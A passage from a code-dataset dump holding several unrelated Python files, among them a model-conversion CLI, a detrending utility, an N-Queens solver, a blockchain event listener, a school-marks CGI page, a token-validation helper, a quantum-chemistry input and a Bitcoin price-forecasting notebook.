ComparatorConfig.from_dict(kwargs)\n dataset_profile_config = DatasetProfileConfig.from_dict(kwargs)\n\n src_model = Model(\n name=src_model_config.model_name,\n path=src_model_config.model_path,\n explicit_format=src_model_config.model_format,\n signature_if_missing=src_model_signature_config,\n )\n\n if not src_model.path.exists():\n LOGGER.error(f\"No such file or directory {src_model.path}\")\n raise click.Abort()\n\n framework = SUFFIX2FRAMEWORK[src_model_config.model_path.suffix]\n framework_docker_image = framework_docker_image or framework.container_image(container_version)\n\n workspace = Workspace(workspace_path)\n\n if launch_mode == ConversionLaunchMode.DOCKER:\n conversion_results = _run_in_docker(\n workspace=workspace,\n override_workspace=override_workspace,\n src_model_config=src_model_config,\n model_signature_config=src_model_signature_config,\n conversion_set_config=conversion_set_config,\n comparator_config=comparator_config,\n dataset_profile_config=dataset_profile_config,\n framework_docker_image=framework_docker_image,\n model_format=src_model.format,\n gpus=gpus,\n verbose=verbose,\n override_conversion_container=override_conversion_container,\n )\n else:\n if verbose:\n log_dict(\n \"convert args:\",\n {\n **dataclasses.asdict(src_model_config),\n **dataclasses.asdict(conversion_set_config),\n **dataclasses.asdict(comparator_config),\n **dataclasses.asdict(src_model_signature_config),\n **dataclasses.asdict(dataset_profile_config),\n \"workspace_path\": workspace_path,\n \"override_workspace\": override_workspace,\n \"output_path\": output_path,\n \"container_version\": container_version,\n \"framework_docker_image\": framework_docker_image,\n \"gpus\": gpus,\n },\n )\n\n conversion_results = _run_locally(\n workspace=workspace,\n override_workspace=override_workspace,\n src_model_config=src_model_config,\n model_signature_config=src_model_signature_config,\n conversion_set_config=conversion_set_config,\n comparator_config=comparator_config,\n dataset_profile_config=dataset_profile_config,\n verbose=verbose,\n )\n\n results_store = ResultsStore(workspace)\n results_store.dump(\"convert_model\", conversion_results)\n\n successful_conversion_results = [result for result in conversion_results if result.status.state == State.SUCCEEDED]\n if not successful_conversion_results:\n raise ModelNavigatorException(\"No successful conversion performed.\")\n elif output_path is not None:\n _copy_to_output_path(conversion_results, output_path)\n\n return conversion_results\n\n\n@click.command(name=\"convert\", help=\"Converts models between formats\")\n@common_options\n@options_from_config(ModelConfig, ModelConfigCli)\n@click.option(\"-o\", \"--output-path\", help=\"Path to the output file.\", type=click.Path())\n@click.option(\n \"--launch-mode\",\n type=click.Choice([item.value for item in ConversionLaunchMode]),\n default=ConversionLaunchMode.DOCKER.value,\n help=\"The method by which to launch conversion. \"\n \"'local' assume conversion will be run locally. \"\n \"'docker' build conversion Docker and perform operations inside it.\",\n)\n@click.option(\n \"--override-conversion-container\", is_flag=True, help=\"Override conversion container if it already exists.\"\n)\n@options_from_config(ModelSignatureConfig, ModelSignatureConfigCli)\n@options_from_config(ConversionSetConfig, ConversionSetConfigCli)\n@options_from_config(ComparatorConfig, ComparatorConfigCli)\n@options_from_config(DatasetProfileConfig, DatasetProfileConfigCli)\n@click.pass_context\ndef convert_cmd(\n ctx,\n *,\n verbose: bool,\n launch_mode: str,\n override_conversion_container: bool,\n **kwargs,\n):\n init_logger(verbose=verbose)\n LOGGER.debug(f\"Running '{ctx.command_path}' with config_path: {kwargs.get('config_path')}\")\n\n run_command_validators(\n ctx.command.name,\n configuration={\n \"verbose\": verbose,\n \"launch_mode\": launch_mode,\n \"override_conversion_container\": override_conversion_container,\n **kwargs,\n },\n )\n\n launch_mode = ConversionLaunchMode(launch_mode)\n\n try:\n return convert(\n verbose=verbose,\n launch_mode=launch_mode,\n override_conversion_container=override_conversion_container,\n **kwargs,\n )\n except ModelNavigatorException as e:\n message = str(e)\n raise ModelNavigatorCliException(message)\n","sub_path":"model_navigator/cli/convert_model.py","file_name":"convert_model.py","file_ext":"py","file_size_in_byte":16616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"497217427","text":"# -*- coding: utf-8 -*-\n\"\"\"In some time series there is a trend component that does not interest us, e.g., because we have domain knowledge that this trend is due to another phenomenon like instrument drift. In this case, we might want to remove the trend component for furhter modeling.\nThe same is the case for the variance. If the variance increases over time, one might want to remove this effect using a Box-Cox transformation [1]\n\nReferences:\n[1] https://otexts.com/fpp2/transformations.html#mathematical-transformations\n\"\"\"\n\nfrom copy import deepcopy\nfrom typing import Union\n\nimport pandas as pd\nimport statsmodels\n\n__all__ = [\"detrend_stochastic\", \"detrend_linear_deterministc\"]\n\n\ndef detrend_stochastic(data: Union[pd.Series, pd.DataFrame]) -> Union[pd.Series, pd.DataFrame]:\n \"\"\"Detrends time series data using the difference method y_t - y_{t-1}.\n This is useful to remove stochastic trends (random walk with trend).\n\n Args:\n data (Union[pd.Series, pd.DataFrame]): Time series data to detrend\n\n Returns:\n Union[pd.Series, pd.DataFrame]: Differenced data\n \"\"\"\n new_data = data.diff()\n new_data = new_data.iloc[1:]\n return new_data\n\n\ndef _detrend_series(series):\n clean_data = statsmodels.tsa.tsatools.detrend(series.values, order=1, axis=0)\n return pd.Series(clean_data, index=series.index, name=series.name)\n\n\ndef detrend_linear_deterministc(\n data: Union[pd.Series, pd.DataFrame]\n) -> Union[pd.Series, pd.DataFrame]:\n \"\"\"Removes a deterministic linear trend from a series.\n Note that we assume that the data is sampled on a regular grid and\n we estimate the trend as\n\n np.arange(\n len(series) * (series.iloc[end] - series.iloc[start]) / (end - start)\n )\n\n Args:\n data (Union[pd.Series, pd.DataFrame]): Data to detrend. In case of\n dataframes we detrend every column separately.\n\n Returns:\n Union[pd.Series, pd.DataFrame]: Detrended data\n \"\"\"\n data_ = deepcopy(data)\n\n if isinstance(data_, pd.DataFrame):\n for column in data_:\n data_[column] = _detrend_series(data_[column])\n return data_\n else:\n return _detrend_series(data)\n","sub_path":"src/aeml/preprocessing/detrend.py","file_name":"detrend.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"388931489","text":"# n 皇后问题研究的是如何将 n 个皇后放置在 n×n 的棋盘上,并且使皇后彼此之间不能相互攻击。\n#\n# 给定一个整数 n,返回所有不同的 n 皇后问题的解决方案。\n#\n# 每一种解法包含一个明确的 n 皇后问题的棋子放置方案,该方案中 'Q' 和 '.' 分别代表了皇后和空位。\nimport copy\nclass Solution:\n\tdef solveNQueens(self, n):\n\t\t\"\"\"\n\t\t:type n: int\n\t\t:rtype: List[List[str]]\n\t\t\"\"\"\n\t\tself.out = []\n\t\tself.n = n\n\t\t#初始化棋盘\n\t\tcheck = [['.' for _ in range(n)] for _ in range(n)]\n\t\t#递归\n\t\tfor k in range(1,n+1):\n\t\t\tself.recurs_setQueen(copy.deepcopy(check),n,1,k)\n\t\treturn self.out\n\tdef setQueen(self,check,rows,i):\n\t\t#在rows行,i列设置皇后\n\t\tcheck[rows-1][i-1] = 'Q'\n\tdef isLegal(self,check,rows,i):\n\t\t#检查一列有没有皇后\n\t\tr = rows-2\n\t\tc = i-1\n\t\twhile not (r == -1):\n\t\t\tif check[r][c] == 'Q':\n\t\t\t\treturn False\n\t\t\tr -= 1\n\t\t#检查对角线\n\t\tr = rows-2\n\t\tc = i-2\n\t\twhile not ((r==-1) | (c == -1)):\n\t\t\tif check[r][c] == 'Q':\n\t\t\t\treturn False\n\t\t\tr -= 1\n\t\t\tc -= 1\n\t\tr = rows-2\n\t\tc = i\n\t\twhile not ((r==-1) | (c == self.n)):\n\t\t\tif check[r][c] == 'Q':\n\t\t\t\treturn False\n\t\t\tr -= 1\n\t\t\tc += 1\n\t\treturn True\n\tdef display(self,check):\n\t\tlist = []\n\t\tfor i in check:\n\t\t\tlist.append(''.join(i))\n\t\tself.out.append(list)\n\tdef recurs_setQueen(self,check,n,rows,cols):\n\t\tself.setQueen(check,rows, cols)\n\t\tif self.isLegal(check,rows, cols) == False:\n\t\t\treturn\n\n\t\tif rows == n:\n\t\t\tself.display(check)\n\t\t\treturn\n\t\tfor i in range(1,n+1):\n\t\t\tself.recurs_setQueen(copy.deepcopy(check),n,rows+1,i)","sub_path":"递归/回溯/solveNQueens.py","file_name":"solveNQueens.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"557623320","text":"import sys\nfrom client.bcosclient import BcosClient\nfrom client.datatype_parser import DatatypeParser\nfrom client.contractnote import ContractNote\nimport json\nimport time\nfrom client.channel_push_dispatcher import ChannelPushHandler\nfrom client.event_callback import BcosEventCallback\nfrom client.event_callback import EventCallbackHandler\nfrom client_config import client_config\ndemo_config = client_config\n\ndef usage():\n usagetext = '\\nUsage:\\nparams: contractname address event_name indexed\\n' \\\n '\\t1. contractname :\\t合约的文件名,不需要带sol后缀,默认在当前目录的contracts目录下\\n' \\\n '\\t2. address :\\t十六进制的合约地址,或者可以为:last 或 latest,表示采用bin/contract.ini里的记录\\n' \\\n '\\t3. event_name :\\t可选,如不设置监听所有事件 \\n' \\\n '\\t4. indexed :\\t可选,根据event定义里的indexed字段,作为过滤条件)\\n\\n'\n usagetext = usagetext + \"\\teg: for contract sample [contracts/HelloEvent.sol], use cmdline:\\n\\n\"\n\n usagetext = usagetext + \"\\tpython demo_event_callback.py HelloEvent last \\n\"\n usagetext = usagetext + \"\\t--listen all event at all indexed : \\n\\n\"\n\n usagetext = usagetext + \"\\tpython demo_event_callback.py HelloEvent last on_set \\n\"\n usagetext = usagetext + \"\\t--listen event on_set(string newname) (no indexed): \\n\\n\"\n\n usagetext = usagetext + \\\n \"\\tpython demo_event_callback.py HelloEvent last on_number 5\\n\"\n usagetext = usagetext + \\\n \"\\t--listen event on_number(string name,int indexed age), age ONLY 5 : \\n\"\n usagetext = usagetext + \"\\n...(and other events)\"\n print(usagetext)\n\n\nclass EventCallbackImpl01(EventCallbackHandler):\n \"\"\"sample event push handler for application level,\n user can make a class base on \"ChannelPushHandler\" ,implement the on_push interface\n handle the message from nodes,message in ChannelPack type #see client/channelpack.py\n EVENT_LOG_PUSH type is 0x1002\n message in pack.data decode by utf-8\n EVENT_LOG format see https://fisco-bcos-documentation.readthedocs.io/zh_CN/latest/docs/sdk/java_sdk.html#id19\n \"\"\"\n abiparser: DatatypeParser = None\n\n def on_event(self, eventdata):\n loglist = self.abiparser.parse_event_logs(eventdata[\"logs\"])\n print(\"- FilterID >>> \", eventdata[\"filterID\"])\n print(\n \"--------------------EventCallbackImpl01--------------------\\n\",\n json.dumps(loglist, indent=4))\n\n\nclass EventCallbackImpl02(ChannelPushHandler):\n abiparser: DatatypeParser = None\n\n def on_event(self, eventdata):\n loglist = self.abiparser.parse_event_logs(eventdata[\"logs\"])\n print(\">> FilterID \", eventdata[\"filterID\"])\n print(\">>>>>>>>>>>>>>>>>>EventCallbackImpl02\", json.dumps(loglist, indent=4))\n\n\ndef main(argv):\n if len(argv) < 2:\n usage()\n exit(0)\n\n contractname = argv[0]\n address = argv[1]\n event_name = None\n indexed_value = None\n if len(argv) > 2:\n event_name = argv[2]\n indexed_value = argv[3:]\n try:\n bcos_event = BcosEventCallback()\n if demo_config.client_protocol is not demo_config.PROTOCOL_CHANNEL:\n print(\"** using event callback, client prototol MUST be demo_config.PROTOCOL_CHANNEL!!\")\n print(\"** please check the configure file\")\n sys.exit(-1)\n\n bcos_event.setclient(BcosClient())\n print(bcos_event.client.getinfo())\n\n print(\"usage input {},{},{},{}\".format(contractname, address, event_name, indexed_value))\n print(address)\n if address == \"last\" or address == \"latest\":\n cn = ContractNote()\n address = cn.get_last(bcos_event.client.get_full_name(),contractname)\n print(\"hex address :\", address)\n abifile = \"contracts/\" + contractname + \".abi\"\n abiparser = DatatypeParser(abifile)\n eventcallback01 = EventCallbackImpl01()\n eventcallback02 = EventCallbackImpl02()\n eventcallback01.abiparser = abiparser\n eventcallback02.abiparser = abiparser\n\n result = bcos_event.register_eventlog_filter(\n eventcallback01, abiparser, [address], event_name, indexed_value)\n #result = bcos_event.register_eventlog_filter(eventcallback02,abiparser, [address], \"on_number\")\n\n print(\n \"after register ,event_name:{},result:{},all:{}\".format(\n event_name,\n result['result'], result))\n\n while True:\n print(\"waiting event...\")\n time.sleep(10)\n except Exception as e:\n print(\"Exception!\")\n import traceback\n traceback.print_exc()\n finally:\n print(\"event callback finished!\")\n if bcos_event.client is not None:\n bcos_event.client.finish()\n sys.exit(-1)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"2022-shenzhen-FinTechathon/main_chain()/python sdk/demo_event_callback.py","file_name":"demo_event_callback.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"488765060","text":"#!/usr/bin/python\nprint('Content-type: text/html\\n')\n\n'''\n\nSynergetic Lite\n\nTEACHER SIDE\n\neditMarks.py\n\nTeacher can edit existing marks for each student in a class for an assessment\n\nBy Nick Patrikeos on 04JAN18\n\n'''\n\nimport cgi\nimport cgitb; cgitb.enable()\nimport sqlite3\nfrom dbFunctions import *\n\nform = cgi.FieldStorage()\nclassID = form.getvalue('classID')\nassessmentID = form.getvalue('assessmentID')\n\nvalues = {'classID':classID, 'assessmentID': assessmentID}\n\ndb = sqlite3.connect('synergetic.db')\ncursor = db.cursor()\ncursor.execute('PRAGMA foreign_keys = ON')\n\nstartHTML('Synergetic Lite', 'main')\n\nprint('

Edit Marks for Assessment

')\nprint('
')\n\ncursor.execute('SELECT Student FROM Enrolments WHERE Class = :classID', values)\nstudents = cursor.fetchall()\n\ncursor.execute('SELECT Out_Of FROM Assessments WHERE Assessment_ID = :assessmentID', values)\noutOf = cursor.fetchall()[0][0]\n\nfieldnames = ['Student', 'Mark']\nprint('
')\n\nfor i in range(len(students)):\n cursor.execute('SELECT Raw_Mark FROM Marks WHERE Student = :studentID AND Assessment = :assessmentID',\n {'studentID':students[i][0], 'assessmentID':assessmentID})\n mark = cursor.fetchall()[0][0]\n students[i] += ('/' + str(outOf),)\n\nprint_Records(students, fields=fieldnames)\nprint('')\nprint('')\nprint('')\nprint('
')\nprint('')\n\nprint('
')\n\nendHTML()\n","sub_path":"Synergetic Lite/editMarks.py","file_name":"editMarks.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627673200","text":"\"\"\"Collection of utility functions\n\"\"\"\nimport logging\nimport yaml\n\nlog = logging.getLogger(__name__) # pylint: disable=C0103\n\n\ndef get_access_token_yaml(token_yaml):\n \"\"\"Utility function to read in access token yaml\n\n Parameters\n ----------\n token_yaml: str\n Path of the token yaml file\n\n Returns\n -------\n dict\n Dicitonary with the access token parameters\n \"\"\"\n try:\n with open(token_yaml) as yaml_file:\n log.debug(\"Loading access token from yaml...\")\n token_yaml = yaml.load(yaml_file, Loader=yaml.FullLoader)\n except Exception:\n log.error(\"Error loading access token from yaml...\")\n raise\n\n validate_access_token(**token_yaml)\n return token_yaml\n\n\ndef validate_access_token(\n access_token=None,\n api_server=None,\n expires_in=None,\n refresh_token=None,\n token_type=None,\n):\n \"\"\"Validate access token\n\n This function validates the access token and ensures that all requiered\n attributes are provided.\n\n Parameters\n ----------\n access_token: str, optional\n Access token\n api_server: str, optional\n Api server URL\n expires_in: int, optional\n Time until token expires\n refresh_token: str, optional\n Refresh token\n token_type: str, optional\n Token type\n\n Raises\n ------\n Exception\n If any of the inputs is None.\n \"\"\"\n log.debug(\"Validating access token...\")\n if access_token is None:\n raise Exception(\"Access token was not provided.\")\n if api_server is None:\n raise Exception(\"API server URL was not provided.\")\n if expires_in is None:\n raise Exception(\"Expiry time was not provided.\")\n if refresh_token is None:\n raise Exception(\"Refresh token was not provided.\")\n if token_type is None:\n raise Exception(\"Token type was not provided.\")\n","sub_path":"qtrade/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"250113035","text":"#!/usr/bin/env python\n\nfrom pyscf import gto\nfrom pyscf import scf, dft, df\n\nmol = gto.Mole()\nmol.verbose = 5\nmol.atom =''' \n H 0.00000000 0.75720000 -0.46920000\n H 0.00000000 -0.75720000 -0.46920000\n O 0.00000000 0.00000000 0.11730000\n '''\nmol.unit='A'\nmol.basis = 'cc-pvtz'\n#mol.pseudo = 'bfd-vtz'\nmol.spin=0 #Value of S where the spin multiplicity is 2S+1\nmol.build()\n\n\n\n#Hartree Fock\n#mf = scf.ROHF(mol)\n\n#DFT\nmf = dft.ROKS(mol)\nmf.xc ='b3lyp' \n\ne_scf=mf.kernel()\n\n#Section for QMCPACK\ntitle=\"H2O_AE_DFT\"\nfrom PyscfToQmcpack import savetoqmcpack\nsavetoqmcpack(mol,mf,title=title)\n\n","sub_path":"day1_pyscf_molecules/H2O/DFT_AE/ref_files/h2o_ae_dft.py","file_name":"h2o_ae_dft.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"586245403","text":"\n#%%\n#This code is retrieved from https://activewizards.com/blog/bitcoin-price-forecasting-with-deep-learning-algorithms/\n\n\n#%%\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom scipy import stats\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nfrom random import randint\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import GRU\nfrom keras.callbacks import EarlyStopping\nfrom keras import initializers\nfrom matplotlib import pyplot\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\nimport plotly.offline as py\nimport plotly.graph_objs as go\npy.init_notebook_mode(connected=True)\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n#%%\ndata = pd.read_csv('./coinbaseUSD_1-min_data_2014-12-01_to_2018-11-11.csv')\ndata.isnull().values.any()\ndata.head(10)\n\n\n#%%\ndata['date'] = pd.to_datetime(data['Timestamp'],unit='s').dt.date\ngroup = data.groupby('date')\nDaily_Price = group['Weighted_Price'].mean()\n\n\n#%%\nDaily_Price.head()\n\n\n#%%\nDaily_Price.tail()\n\n\n#%%\nimport datetime\nd0 = datetime.date(2016, 1, 1)\nd1 = datetime.date(2017, 10, 15)\ndelta = d1 - d0\ndays_look = delta.days + 1\nprint(days_look)\n\nd0 = datetime.date(2017, 8, 21)\nd1 = datetime.date(2017, 10, 20)\ndelta = d1 - d0\ndays_from_train = delta.days + 1\nprint(days_from_train)\n\nd0 = datetime.date(2017, 10, 15)\nd1 = datetime.date(2017, 10, 20)\ndelta = d1 - d0\ndays_from_end = delta.days + 1\nprint(days_from_end)\n\n\n#%%\ndf_train= Daily_Price[len(Daily_Price)-days_look-days_from_end:len(Daily_Price)-days_from_train]\ndf_test= Daily_Price[len(Daily_Price)-days_from_train:]\n\nprint(len(df_train), len(df_test))\n\n\n#%%\nworking_data = [df_train, df_test]\nworking_data = pd.concat(working_data)\n\nworking_data = working_data.reset_index()\nworking_data['date'] = pd.to_datetime(working_data['date'])\nworking_data = working_data.set_index('date')\n\n\n#%%\ns = sm.tsa.seasonal_decompose(working_data.Weighted_Price.values, freq=60)\ntrace1 = go.Scatter(x = np.arange(0, len(s.trend), 1),y = s.trend,mode = 'lines',name = 'Trend',\n line = dict(color = ('rgb(244, 146, 65)'), width = 4))\ntrace2 = go.Scatter(x = np.arange(0, len(s.seasonal), 1),y = s.seasonal,mode = 'lines',name = 'Seasonal',\n line = dict(color = ('rgb(66, 244, 155)'), width = 2))\n\ntrace3 = go.Scatter(x = np.arange(0, len(s.resid), 1),y = s.resid,mode = 'lines',name = 'Residual',\n line = dict(color = ('rgb(209, 244, 66)'), width = 2))\n\ntrace4 = go.Scatter(x = np.arange(0, len(s.observed), 1),y = s.observed,mode = 'lines',name = 'Observed',\n line = dict(color = ('rgb(66, 134, 244)'), width = 2))\n\ndata = [trace1, trace2, trace3, trace4]\nlayout = dict(title = 'Seasonal decomposition', xaxis = dict(title = 'Time'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='seasonal_decomposition')\n\n\n#%%\nplt.figure(figsize=(15,7))\nax = plt.subplot(211)\nsm.graphics.tsa.plot_acf(working_data.Weighted_Price.values.squeeze(), lags=48, ax=ax)\nax = plt.subplot(212)\nsm.graphics.tsa.plot_pacf(working_data.Weighted_Price.values.squeeze(), lags=48, ax=ax)\nplt.tight_layout()\nplt.show()\n\n\n#%%\ndf_train = working_data[:-60]\ndf_test = working_data[-60:]\n\n\n#%%\ndef create_lookback(dataset, look_back=1):\n X, Y = [], []\n for i in range(len(dataset) - look_back):\n a = dataset[i:(i + look_back), 0]\n X.append(a)\n Y.append(dataset[i + look_back, 0])\n return np.array(X), np.array(Y)\n\n\n#%%\n\n\n\n#%%\nfrom sklearn.preprocessing import MinMaxScaler\n\ntraining_set = df_train.values\ntraining_set = np.reshape(training_set, (len(training_set), 1))\ntest_set = df_test.values\ntest_set = np.reshape(test_set, (len(test_set), 1))\n\n#scale datasets\nscaler = MinMaxScaler()\ntraining_set = scaler.fit_transform(training_set)\ntest_set = scaler.transform(test_set)\n\n# create datasets which are suitable for time series forecasting\nlook_back = 30\nX_train, Y_train = create_lookback(training_set, look_back)\nX_test, Y_test = create_lookback(test_set, look_back)\n\n # reshape datasets so that they will be ok for the requirements of the LSTM model in Keras\nX_train = np.reshape(X_train, (len(X_train), 1, X_train.shape[1]))\nX_test = np.reshape(X_test, (len(X_test), 1, X_test.shape[1]))\n\n\n#%%\n# initialize sequential model, add 2 stacked LSTM layers and densely connected output neuron\nmodel = Sequential()\nmodel.add(LSTM(256, return_sequences=True, input_shape=(X_train.shape[1], X_train.shape[2])))\nmodel.add(LSTM(256))\nmodel.add(Dense(1))\n\n# compile and fit the model\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nhistory = model.fit(X_train, Y_train, epochs=100, batch_size=16, shuffle=False,\n validation_data=(X_test, Y_test),\n callbacks = [EarlyStopping(monitor='val_loss', min_delta=5e-5, patience=20, verbose=1)])\n\n\n#%%\ntrace1 = go.Scatter(\n x = np.arange(0, len(history.history['loss']), 1),\n y = history.history['loss'],\n mode = 'lines',\n name = 'Train loss',\n line = dict(color=('rgb(66, 244, 155)'), width=2, dash='dash')\n)\ntrace2 = go.Scatter(\n x = np.arange(0, len(history.history['val_loss']), 1),\n y = history.history['val_loss'],\n mode = 'lines',\n name = 'Test loss',\n line = dict(color=('rgb(244, 146, 65)'), width=2)\n)\n\ndata = [trace1, trace2]\nlayout = dict(title = 'Train and Test Loss during training',\n xaxis = dict(title = 'Epoch number'), yaxis = dict(title = 'Loss'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='training_process')\n\n\n#%%\n# add one additional data point to align shapes of the predictions and true labels\n#X_test = np.append(X_test, scaler.transform(working_data.iloc[-1][0]))\nX_test = np.append(X_test, working_data.iloc[-1][0])\nX_test = np.reshape(X_test, (len(X_test), 1, 1))\n\n# get predictions and then make some transformations to be able to calculate RMSE properly in USD\nprediction = model.predict(X_test)\nprediction_inverse = scaler.inverse_transform(prediction.reshape(-1, 1))\nY_test_inverse = scaler.inverse_transform(Y_test.reshape(-1, 1))\nprediction2_inverse = np.array(prediction_inverse[:,0][1:])\nY_test2_inverse = np.array(Y_test_inverse[:,0])\n\n\n#%%\ntrace1 = go.Scatter(\n x = np.arange(0, len(prediction2_inverse), 1),\n y = prediction2_inverse,\n mode = 'lines',\n name = 'Predicted labels',\n line = dict(color=('rgb(244, 146, 65)'), width=2)\n)\ntrace2 = go.Scatter(\n x = np.arange(0, len(Y_test2_inverse), 1),\n y = Y_test2_inverse,\n mode = 'lines',\n name = 'True labels',\n line = dict(color=('rgb(66, 244, 155)'), width=2)\n)\n\ndata = [trace1, trace2]\nlayout = dict(title = 'Comparison of true prices (on the test dataset) with prices our model predicted',\n xaxis = dict(title = 'Day number'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='results_demonstrating0')\n\n\n#%%\nRMSE = sqrt(mean_squared_error(Y_test2_inverse, prediction2_inverse))\nprint('Test RMSE: %.3f' % RMSE)\n\n\n#%%\nTest_Dates = Daily_Price[len(Daily_Price)-days_from_train:].index\n\ntrace1 = go.Scatter(x=Test_Dates, y=Y_test2_inverse, name= 'Actual Price',\n line = dict(color = ('rgb(66, 244, 155)'),width = 2))\ntrace2 = go.Scatter(x=Test_Dates, y=prediction2_inverse, name= 'Predicted Price',\n line = dict(color = ('rgb(244, 146, 65)'),width = 2))\ndata = [trace1, trace2]\nlayout = dict(title = 'Comparison of true prices (on the test dataset) with prices our model predicted, by dates',\n xaxis = dict(title = 'Date'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='results_demonstrating1')\n\n\n#%%\n# This function prepares random train/test split, \n# scales data with MinMaxScaler, create time series labels (Y)\ndef get_split(working_data, n_train, n_test, look_back = 1):\n # get a point from which we start to take train dataset and after it - test dataset\n start_point = randint(0, (len(working_data)-n_test-n_train))\n df_train = working_data[start_point:start_point+n_train]\n df_test = working_data[start_point+n_train:start_point+n_train+n_test]\n\n training_set = df_train.values\n training_set = np.reshape(training_set, (len(training_set), 1))\n test_set = df_test.values\n test_set = np.reshape(test_set, (len(test_set), 1))\n\n # scale datasets\n scaler_cv = MinMaxScaler()\n training_set = scaler_cv.fit_transform(training_set)\n test_set = scaler_cv.transform(test_set)\n\n # create datasets which are suitable for time series forecasting\n X_train, Y_train = create_lookback(training_set, look_back)\n X_test, Y_test = create_lookback(test_set, look_back)\n\n # reshape datasets so that they will be ok for the requirements of the models in Keras\n X_train = np.reshape(X_train, (len(X_train), 1, X_train.shape[1]))\n X_test = np.reshape(X_test, (len(X_test), 1, X_test.shape[1]))\n\n return X_train, Y_train, X_test, Y_test, scaler_cv, start_point\n\n# This function takes datasets from the previous function as input and train model using these datasets\ndef train_model(X_train, Y_train, X_test, Y_test):\n # initialize sequential model, add bidirectional LSTM layer and densely connected output neuron\n model = Sequential()\n model.add(GRU(256, input_shape=(X_train.shape[1], X_train.shape[2])))\n model.add(Dense(1))\n\n # compile and fit the model\n model.compile(loss='mean_squared_error', optimizer='adam')\n model.fit(X_train, Y_train, epochs = 100, batch_size = 16, shuffle = False,\n validation_data=(X_test, Y_test), verbose=0,\n callbacks = [EarlyStopping(monitor='val_loss',min_delta=5e-5,patience=20,verbose=0)])\n return model\n\n# This function uses trained model and test dataset to calculate RMSE\ndef get_rmse(model, X_test, Y_test, scaler, start_point, working_data, n_train):\n # add one additional data point to align shapes of the predictions and true labels\n X_test = np.append(X_test, scaler.transform(working_data.iloc[start_point+n_train+len(X_test)][0]))\n X_test = np.reshape(X_test, (len(X_test), 1, 1))\n\n # get predictions and then make some transformations to be able to calculate RMSE properly in USD\n prediction = model.predict(X_test)\n prediction_inverse = scaler.inverse_transform(prediction.reshape(-1, 1))\n Y_test_inverse = scaler.inverse_transform(Y_test.reshape(-1, 1))\n prediction2_inverse = np.array(prediction_inverse[:,0][1:])\n Y_test2_inverse = np.array(Y_test_inverse[:,0])\n\n #calculate RMSE\n RMSE = sqrt(mean_squared_error(Y_test2_inverse, prediction2_inverse))\n return RMSE, prediction2_inverse\n\n\n#%%\ndef workflow(working_data, get_split, train_model, get_rmse,n_train = 250,n_test = 50,look_back = 1):\n X_train, Y_train, X_test, Y_test, scaler, start_point = get_split(working_data, n_train, n_test)\n model = train_model(X_train, Y_train, X_test, Y_test)\n RMSE, predictions = get_rmse(model, X_test, Y_test, scaler, start_point, working_data, n_train)\n return RMSE, predictions\n\n\n#%%\nRMSE, predictions = workflow(working_data, get_split, train_model, get_rmse, n_train = 600,n_test = 60)\nprint('Test GRU model RMSE: %.3f' % RMSE)\n\n\n#%%\n# This function is used to repeat the workflow ten times and to calculate average RMSE\ndef cross_validate(working_data,get_split,train_model,get_rmse,workflow,n_train = 250,n_test = 50,look_back = 1):\n rmse_list = []\n for i in range(10):\n print('Iteration:', i+1)\n RMSE, _ = workflow(working_data, get_split, train_model, get_rmse, n_train, n_test, look_back)\n rmse_list.append(RMSE)\n print('Test RMSE: %.3f' % RMSE)\n mean_rmse = np.mean(rmse_list)\n return mean_rmse, rmse_list\n\n\n#%%\nmean_rmse, rmse_list = cross_validate(working_data, get_split, train_model, get_rmse, workflow)\nprint('Average RMSE: ', mean_rmse)\nprint('RMSE list:', rmse_list)\n\n\n#%%\npredictions_new = predictions - mean_rmse\n\nRMSE_new = sqrt(mean_squared_error(Y_test2_inverse, predictions_new))\nprint('Test GRU model RMSE_new: %.3f' % RMSE_new)\n\n\n#%%\ntrace1 = go.Scatter(x=Test_Dates, y=Y_test2_inverse, name= 'Actual Price',\n line = dict(color = ('rgb(66, 244, 155)'),width = 2))\ntrace2 = go.Scatter(x=Test_Dates, y=predictions_new, name= 'Predicted Price',\n line = dict(color = ('rgb(244, 146, 65)'),width = 2))\ndata = [trace1, trace2]\nlayout = dict(title = 'Comparison of true prices (on the test dataset) with prices our model predicted, by dates',\n xaxis = dict(title = 'Date'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='results_demonstrating2')\n\n\n#%%\ndef symmetric_mean_absolute_percentage_error(y_true, y_pred, epsilon = 1e-8):\n return np.mean(np.abs(y_pred - y_true) / ((np.abs(y_true) + np.abs(y_pred))/2 + epsilon)) * 100\n\nSMAPE = symmetric_mean_absolute_percentage_error(Y_test2_inverse, predictions_new)\n\nprint('Test SMAPE (percentage): %.3f' % 